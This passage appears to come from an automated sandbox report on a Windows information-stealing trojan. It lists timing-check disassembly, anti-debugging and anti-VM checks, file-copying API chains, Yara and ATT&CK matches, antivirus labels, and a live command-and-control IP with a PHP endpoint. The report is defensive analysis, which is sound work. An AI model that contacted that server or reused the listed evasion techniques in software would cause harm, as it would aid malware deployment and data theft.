                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838B3 second address: 14838C4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BD69DCh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14838C4 second address: 14838D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007F2A68BE4F4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14838D4 second address: 14838E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007F2A68BD69D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14838E1 second address: 14838ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2A68BE4F46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14838ED second address: 14838F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14838F6 second address: 14838FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14838FA second address: 1483908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2A68BD69D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1483908 second address: 148391F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F53h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1485FAB second address: 1485FB8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A68BD69D8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14889A1 second address: 14889AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14889AA second address: 14889AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 149002D second address: 1490049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1490049 second address: 1490055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2A68BD69D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1490055 second address: 149006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A68BE4F53h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 149006D second address: 1490089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F2A68BD69E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1493407 second address: 149340D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 149340D second address: 1493411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1493411 second address: 1493422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2A68BE4F46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14990E7 second address: 1499124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A68BD69E8h 0x00000013 jmp 00007F2A68BD69E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1499124 second address: 1499128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14A69B0 second address: 14A69BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14A69BA second address: 14A69C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14A65B3 second address: 14A65B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14A65B7 second address: 14A65BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14B3D98 second address: 14B3DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14B3DAA second address: 14B3DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14B8738 second address: 14B879D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F2A68BD69D6h 0x0000000d jmp 00007F2A68BD69E0h 0x00000012 jmp 00007F2A68BD69E2h 0x00000017 popad 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jnc 00007F2A68BD69EFh 0x00000020 jmp 00007F2A68BD69E1h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14B879D second address: 14B87A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14B7A86 second address: 14B7A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69DEh 0x00000009 jp 00007F2A68BD69D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14B7A9E second address: 14B7AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14B7BBE second address: 14B7BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BCA32 second address: 14BCA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F2A68BE4F48h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F2A68BE4F48h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov dx, cx 0x00000040 push 1386A7F8h 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BCA8B second address: 14BCA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BCCAF second address: 14BCCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BCCB3 second address: 14BCCC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F2A68BD69DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BCCC7 second address: 14BCCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BCCCB second address: 14BCCD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2A68BD69D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BE161 second address: 14BE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14C007D second address: 14C0086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C0310 second address: 54C0320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C0320 second address: 54C0358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F2A68BD69E6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2A68BD69DAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C0358 second address: 54C035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C035C second address: 54C0362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C0362 second address: 54C0368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C038E second address: 54C0394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C0394 second address: 54C03E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 pushfd 0x00000006 jmp 00007F2A68BE4F59h 0x0000000b jmp 00007F2A68BE4F4Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F2A68BE4F56h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C03E0 second address: 54C03E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54C03E6 second address: 54C042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2A68BE4F56h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2A68BE4F57h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12119D0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13D0566 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13FB62A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB1160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1291738753.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1291738753.0000000000E16000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13556
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13559
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13571
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13576
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13610
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB45C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6448, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe | Binary or memory string: u@Program Manager
Source: file.exe, 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: @Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6448, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6448, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (a leading number is the count of signatures matched for that technique; techniques without a number were not observed)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus detection for the submitted sample

Source | Detection | Scanner | Label
file.exe | 47% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches

Antivirus detection for URLs

Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpD_ | file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpX_ | file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/3O | file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php$ | file.exe, 00000000.00000002.1291738753.0000000000E43000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37g | file.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php8_Tv | file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1540505
                            Start date and time:2024-10-23 20:54:07 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 9s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
